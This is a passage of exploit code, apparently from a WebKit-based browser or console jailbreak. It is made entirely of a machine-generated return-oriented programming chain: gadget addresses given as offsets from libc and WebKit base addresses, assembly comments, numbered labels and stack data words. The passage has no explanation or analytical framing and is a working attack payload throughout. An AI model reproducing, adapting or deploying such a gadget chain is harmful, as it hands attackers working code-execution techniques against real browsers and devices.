libc_base+764760, //pop rsi
ropchain+418000, //L8806
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+417984, //L8805
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8805:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8806:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+418080, //L8807
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8807:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8808:
db([98, 0]); // 0x62
set_gadget(libc_base+144605,); //pop rdi
//L8809:
db([98, 0]); // 0x62
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+418224, //L8810
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+418256, //L8812
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+418240, //L8811
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8810:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8811:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8812:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+418424, //L8814
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+418440, //L8815
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+418408, //L8813
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8813:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8814:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8815:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+418552, //L8817
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+418600, //L8820
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+418568, //L8818
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8817:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8818:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8819:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8820:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+418712, //L8821+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+418704, //L8821
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L8821:
db([0, 0]); // 0x0
set_gadgets([
ropchain+418728, //L8821+24
ropchain+418968, //L8816
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+418784, //L8823
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8822:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L8823:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8824:
db([2, 0]); // 0x2
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+418864, //L8825
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8825:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8827:
db([4294967252, 4294967295]); // -0x2c
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+418944, //L8829
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8829:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+420168, //L8828
//L8816:
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+419024, //L8832
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8831:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L8832:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8833:
db([10, 0]); // 0xa
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+419104, //L8834
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8834:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8836:
db([4294967252, 4294967295]); // -0x2c
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L8838:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+419264, //L8841
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+419248, //L8839
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8839:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8841:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+419440, //L8844
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+419456, //L8845
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+419408, //L8842
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+419424, //L8843
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8842:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8843:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8844:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8845:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+419552, //L8847
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+419536, //L8846
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8846:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8847:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L8848:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L8849:
db([4, 0]); // 0x4
set_gadget(libc_base+763368,); //pop rcx
//L8850:
db([4, 0]); // 0x4
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+419760, //L8852
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L8851:
db([4294967295, 4294967295]); // 0xffffffffffffffff
set_gadget(libc_base+759608,); //pop rax
//L8852:
db([0, 0]); // 0x0
set_gadgets([
libc_base+847417, //xor rax, rsi ; sub rax, rsi
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+419824, //L8854
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8854:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+419880, //L8855
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8855:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+420016, //L8859
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+420000, //L8858
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8857:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L8858:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8859:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+420080, //L8860
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8860:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8862:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+420160, //L8863
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8863:
db([0, 0]); // 0x0
//L8828:
//L8765:
//L8702:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+420208, //L8865
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8865:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8867:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+420328, //L8870
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+420312, //L8868
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8868:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8870:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+420408, //L8871
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+420424, //L8872
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8871:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8872:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+420584, //L8876
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+420552, //L8874
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+420568, //L8875
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8873:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L8874:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8875:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8876:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+420640, //L8878
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L8878:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+420768, //L8880
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+420784, //L8881
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+420752, //L8879
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8879:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8880:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8881:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+420944, //L8885
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+420912, //L8883
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+420928, //L8884
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8882:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L8883:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8884:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8885:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+421000, //L8887
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L8887:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+421128, //L8889
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+421144, //L8890
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+421112, //L8888
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8888:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8889:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8890:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+421304, //L8894
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+421272, //L8892
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+421288, //L8893
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8891:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L8892:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8893:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8894:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+421360, //L8896
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L8896:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+421488, //L8898
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+421504, //L8899
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+421472, //L8897
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8897:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8898:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8899:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+421584, //L8900
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+421600, //L8901
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8900:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8901:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+421696, //L8903
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+421680, //L8902
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8902:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8903:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+421776, //L8904
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8904:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8905:
db([88, 0]); // 0x58
set_gadget(libc_base+144605,); //pop rdi
//L8906:
db([88, 0]); // 0x58
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+421920, //L8907
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+421952, //L8909
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+421936, //L8908
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8907:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8908:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8909:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+422120, //L8911
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+422136, //L8912
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+422104, //L8910
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8910:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8911:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8912:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+422248, //L8914
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+422296, //L8917
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+422264, //L8915
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8914:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8915:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8916:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8917:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+422408, //L8918+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+422400, //L8918
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L8918:
db([0, 0]); // 0x0
set_gadgets([
ropchain+422424, //L8918+24
ropchain+423416, //L8913
libc_base+764760, //pop rsi
ropchain+422464, //L8919
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8919:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8921:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+422584, //L8924
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+422568, //L8922
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8922:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8924:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+422760, //L8927
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+422776, //L8928
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+422728, //L8925
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+422744, //L8926
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8925:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8926:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8927:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8928:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+422872, //L8930
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+422856, //L8929
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8929:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8930:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L8931:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L8932:
db([5, 0]); // 0x5
set_gadget(libc_base+763368,); //pop rcx
//L8933:
db([5, 0]); // 0x5
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+423072, //L8935
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8935:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+423128, //L8936
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8936:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+423264, //L8940
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+423248, //L8939
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8938:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L8939:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8940:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+423328, //L8941
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8941:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8943:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+423408, //L8944
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8944:
db([0, 0]); // 0x0
//L8913:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+423456, //L8946
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8946:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8948:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+423576, //L8951
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+423560, //L8949
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8949:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8951:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+423656, //L8952
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+423672, //L8953
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8952:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8953:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+423832, //L8957
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+423800, //L8955
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+423816, //L8956
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8954:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L8955:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8956:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8957:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+423888, //L8959
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
